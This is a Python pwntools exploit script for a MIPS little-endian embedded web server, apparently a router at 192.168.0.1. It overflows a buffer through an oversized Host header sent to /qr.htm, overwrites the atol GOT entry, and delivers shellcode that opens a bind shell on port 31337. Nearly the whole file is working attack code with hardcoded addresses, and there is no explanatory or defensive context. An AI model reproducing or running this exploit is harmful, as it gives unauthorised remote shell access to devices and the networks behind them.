#!/usr/bin/python3

from pwn import *
import sys
import urllib.request
import urllib.parse


context.clear()
context.arch = 'mips'     
context.bits = 32        
context.endian = 'little'    



class WebService:
    def __init__(self, ip, port=80):
        self.rooturl = "http://" + ip + ':' + str(port)

    def make_req(self, path, arg=None, host='192.168.0.1', has_ContentLength=False):
        headers = {'Host': host}
        if has_ContentLength:
            headers['Content-Length'] = '0'
        if arg is not None:
            parameter = arg
            parameter = urllib.parse.urlencode(parameter)
            fullurl = self.rooturl + path + '?' + parameter
        else:
            fullurl = self.rooturl + path
        req = urllib.request.Request(fullurl, None, headers)
        response = urllib.request.urlopen(req)
        data = response.read()
        return data




 
def shellcode(port=31337):
    shellcode = shellcraft.mips.linux.bindsh(port)
    return asm(shellcode)

def exploit(ip):
    target_ip = '192.168.0.1'
    w = WebService(target_ip)  
    atol_got_addr = 0x423774 - 4
    host_padding = b'a' * 512
    shellcode_addr =  0x438174

    print("[+] Sending exploit to ip:%s" % (target_ip))
    host_str = host_padding + b'AAAA' + p32(shellcode_addr, endian='little') 
    w.make_req('/qr.htm', host=host_str)
    print("[+] Overflowing buffer")
    host_str = host_padding + p32(atol_got_addr, endian='little')
    w.make_req('/qr.htm', host=host_str)
    print("[+] Overwriting got entry")
    w.make_req('/qr.htm', {'_':'hello'})  

    host_str = b'q'*0x40 + shellcode(31337)
    w.make_req('/qr.htm', host=host_str)
    try:
        w.make_req('/qr.htm', has_ContentLength=True)
    except Exception:
        pass
    print("[+] Done!")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Usage: %s <listen ip addr>' % sys.argv[0])
        exit()
    exploit(sys.argv[1])